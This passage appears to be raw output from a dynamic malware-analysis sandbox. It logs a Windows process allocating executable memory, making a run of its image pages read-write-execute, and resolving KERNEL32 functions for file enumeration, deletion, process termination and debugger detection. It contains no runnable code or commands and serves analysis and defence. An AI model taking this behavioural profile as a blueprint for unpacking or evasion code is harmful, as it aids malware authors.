dwFreeType=0x8000) returned 1 [0118.808] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.823] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.826] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.844] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.846] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.862] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.864] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.880] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.882] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.899] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.902] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.918] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.920] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.936] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.939] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.955] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.957] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.973] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.975] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.992] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.036] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0119.052] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.054] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0119.071] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.073] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0119.089] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.095] GetSystemTime (in: lpSystemTime=0x20ba920 | out: lpSystemTime=0x20ba920*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x15, wMinute=0x2c, wSecond=0x11, wMilliseconds=0x175)) [0119.095] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x402000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x403000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x404000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x405000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x406000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x407000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x408000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x409000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x40c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x40d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x40e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x40f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x410000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x411000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.095] VirtualProtect (in: lpAddress=0x412000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x413000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x414000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x415000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x416000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x417000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x418000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x419000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x41a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x41b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x41c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x41d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x41e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x41f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x420000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x421000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x422000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x423000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x424000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x425000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x426000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x427000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x428000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.096] VirtualProtect (in: lpAddress=0x429000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x42a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x42b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x42c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x42d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x42e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x42f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x430000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x431000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x432000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x433000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x434000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x435000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x20) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x436000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x437000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x438000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x439000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x43a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x43b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x43c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x43d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x43e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x4) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x43f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x4) returned 1 [0119.097] VirtualProtect (in: lpAddress=0x440000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x4) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x441000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x4) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x442000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x443000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x444000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x445000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x446000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x447000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x448000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x449000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x44a000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x44b000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x44c000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x44d000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x44e000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x44f000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x450000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x451000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x452000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x453000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x454000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x455000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x456000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.098] VirtualProtect (in: lpAddress=0x457000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.099] VirtualProtect (in: lpAddress=0x458000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20ba8f0 | out: lpflOldProtect=0x20ba8f0*=0x2) returned 1 [0119.162] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75260000 [0119.162] GetProcAddress (hModule=0x75260000, lpProcName="GetFileAttributesA") returned 0x75286310 [0119.163] GetProcAddress (hModule=0x75260000, lpProcName="SetFileAttributesA") returned 0x75286500 [0119.163] GetProcAddress (hModule=0x75260000, lpProcName="lstrlenA") returned 0x75283a30 [0119.163] GetProcAddress (hModule=0x75260000, lpProcName="ReadFile") returned 0x752864a0 [0119.163] GetProcAddress (hModule=0x75260000, lpProcName="CopyFileA") returned 0x7527c510 [0119.163] GetProcAddress (hModule=0x75260000, lpProcName="DeleteFileA") returned 0x752861a0 [0119.163] GetProcAddress (hModule=0x75260000, lpProcName="Process32Next") returned 0x7527c8e0 [0119.163] GetProcAddress (hModule=0x75260000, lpProcName="FindFirstFileA") returned 0x75286210 [0119.164] GetProcAddress (hModule=0x75260000, lpProcName="FindNextFileA") returned 0x75286270 [0119.164] GetProcAddress (hModule=0x75260000, lpProcName="FindClose") returned 0x752861d0 [0119.164] GetProcAddress (hModule=0x75260000, lpProcName="SetEndOfFile") returned 0x752864f0 [0119.164] GetProcAddress (hModule=0x75260000, lpProcName="WriteConsoleW") returned 0x75286920 [0119.164] GetProcAddress (hModule=0x75260000, lpProcName="HeapSize") returned 0x77cf4f40 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="TerminateProcess") returned 0x7527fbc0 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="GetExitCodeProcess") returned 0x7527f6f0 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="OpenProcess") returned 0x752792b0 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="Process32First") returned 0x7527ed60 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="CreateToolhelp32Snapshot") returned 0x75287510 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="WriteFile") returned 0x75286590 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="CreateFileA") returned 0x75286170 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="lstrcatA") returned 0x7527efc0 [0119.165] GetProcAddress (hModule=0x75260000, lpProcName="GetEnvironmentVariableA") returned 0x7527a390 [0119.166] GetProcAddress (hModule=0x75260000, lpProcName="GetModuleFileNameA") returned 0x7527a040 [0119.166] GetProcAddress (hModule=0x75260000, lpProcName="GetDriveTypeA") returned 0x752862f0 [0119.166] GetProcAddress (hModule=0x75260000, lpProcName="GetLogicalDriveStringsA") returned 0x7529e9a0 [0119.166] GetProcAddress (hModule=0x75260000, lpProcName="CloseHandle") returned 0x75285f20 [0119.166] GetProcAddress (hModule=0x75260000, lpProcName="WaitForSingleObject") returned 0x75286110 [0119.166] GetProcAddress (hModule=0x75260000, lpProcName="CreateProcessA") returned 0x752a0960 [0119.166] GetProcAddress (hModule=0x75260000, lpProcName="GetStdHandle") returned 0x7527a060 [0119.166] GetProcAddress (hModule=0x75260000, lpProcName="MoveFileA") returned 0x7527c240 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="GetConsoleWindow") returned 0x752c6940 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="WideCharToMultiByte") returned 0x752775a0 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="DuplicateHandle") returned 0x75285f30 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="WaitForSingleObjectEx") returned 0x75286120 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="Sleep") returned 0x752777b0 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="GetCurrentProcess") returned 0x75272da0 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="GetCurrentThread") returned 0x752775c0 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="GetCurrentThreadId") returned 0x75271b90 [0119.167] GetProcAddress (hModule=0x75260000, lpProcName="GetExitCodeThread") returned 0x7527eed0 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="EnterCriticalSection") returned 0x77ce5e80 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="LeaveCriticalSection") returned 0x77ce5e00 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="TryEnterCriticalSection") returned 0x77cf9070 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="DeleteCriticalSection") returned 0x77cf9920 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="GetLastError") returned 0x75272db0 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x77cfa200 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="MultiByteToWideChar") returned 0x75272d60 [0119.168] GetProcAddress (hModule=0x75260000, lpProcName="QueryPerformanceCounter") returned 0x75272dc0 [0119.169] GetProcAddress (hModule=0x75260000, lpProcName="SetLastError") returned 0x75272af0 [0119.169] GetProcAddress (hModule=0x75260000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75286020 [0119.169] GetProcAddress (hModule=0x75260000, lpProcName="CreateEventW") returned 0x75285fa0 [0119.169] GetProcAddress (hModule=0x75260000, lpProcName="TlsAlloc") returned 0x75279a70 [0119.169] GetProcAddress (hModule=0x75260000, lpProcName="TlsGetValue") returned 0x75271ba0 [0119.169] GetProcAddress (hModule=0x75260000, lpProcName="TlsSetValue") returned 0x75271da0 [0119.169] GetProcAddress (hModule=0x75260000, lpProcName="TlsFree") returned 0x75279930 [0119.169] GetProcAddress (hModule=0x75260000, lpProcName="GetSystemTimeAsFileTime") returned 0x75272b90 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="GetTickCount") returned 0x752857f0 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="GetModuleHandleW") returned 0x75279660 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="GetProcAddress") returned 0x75277940 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="CompareStringW") returned 0x75282230 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="LCMapStringW") returned 0x75279a40 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="GetLocaleInfoW") returned 0x7527c800 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="GetStringTypeW") returned 0x752779b0 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="GetCPInfo") returned 0x75279fc0 [0119.170] GetProcAddress (hModule=0x75260000, lpProcName="IsProcessorFeaturePresent") returned 0x75279680 [0119.171] GetProcAddress (hModule=0x75260000, lpProcName="UnhandledExceptionFilter") returned 0x752a28e0 [0119.171] GetProcAddress (hModule=0x75260000, lpProcName="SetUnhandledExceptionFilter") returned 0x7527a2c0 [0119.171] GetProcAddress (hModule=0x75260000, lpProcName="GetCurrentProcessId") returned 0x75271d90 [0119.171] GetProcAddress (hModule=0x75260000, lpProcName="InitializeSListHead") returned 0x77d01fc0 [0119.171] GetProcAddress (hModule=0x75260000, lpProcName="IsDebuggerPresent") returned 0x7527a790 [0119.171] GetProcAddress (hModule=0x75260000, lpProcName="GetStartupInfoW") returned 0x7527a080 [0119.171] GetProcAddress (hModule=0x75260000, lpProcName="CreateTimerQueue") returned 0x752a0ae0 [0119.172] GetProcAddress (hModule=0x75260000, lpProcName="SetEvent") returned 0x752860c0 [0119.172] GetProcAddress (hModule=0x75260000, lpProcName="SignalObjectAndWait") returned 0x752a2850 [0119.172] GetProcAddress (hModule=0x75260000, lpProcName="SwitchToThread") returned 0x75279f30 [0119.172] GetProcAddress (hModule=0x75260000, lpProcName="CreateThread") returned 0x75279700 [0119.172] GetProcAddress (hModule=0x75260000, lpProcName="SetThreadPriority") returned 0x75279490 [0119.172] GetProcAddress (hModule=0x75260000, lpProcName="GetThreadPriority") returned 0x752796a0 [0119.173] GetProcAddress (hModule=0x75260000, lpProcName="GetLogicalProcessorInformation") returned 0x7527a550 [0119.173] GetProcAddress (hModule=0x75260000, lpProcName="CreateTimerQueueTimer") returned 0x75284a00 [0119.173] GetProcAddress (hModule=0x75260000, lpProcName="ChangeTimerQueueTimer") returned 0x752a07c0 [0119.173] GetProcAddress (hModule=0x75260000, lpProcName="DeleteTimerQueueTimer") returned 0x75284a20 [0119.173] GetProcAddress (hModule=0x75260000, lpProcName="GetNumaHighestNodeNumber") returned 0x7527a7e0 [0119.173] GetProcAddress (hModule=0x75260000, lpProcName="GetProcessAffinityMask") returned 0x7527a220 [0119.173] GetProcAddress (hModule=0x75260000, lpProcName="SetThreadAffinityMask") returned 0x7527e0e0 [0119.174] GetProcAddress (hModule=0x75260000, lpProcName="RegisterWaitForSingleObject") returned 0x75279580 [0119.174] GetProcAddress (hModule=0x75260000, lpProcName="UnregisterWait") returned 0x7527ed20 [0119.174] GetProcAddress (hModule=0x75260000, lpProcName="GetThreadTimes") returned 0x75279f80 [0119.174] GetProcAddress (hModule=0x75260000, lpProcName="FreeLibrary") returned 0x752798f0 [0119.174] GetProcAddress (hModule=0x75260000, lpProcName="FreeLibraryAndExitThread") returned 0x7527a570 [0119.174] GetProcAddress (hModule=0x75260000, lpProcName="GetModuleFileNameW") returned 0x75279560 [0119.174] GetProcAddress (hModule=0x75260000, lpProcName="GetModuleHandleA") returned 0x75279640 [0119.174] GetProcAddress (hModule=0x75260000, lpProcName="LoadLibraryExW") returned 0x75277920 [0119.175] 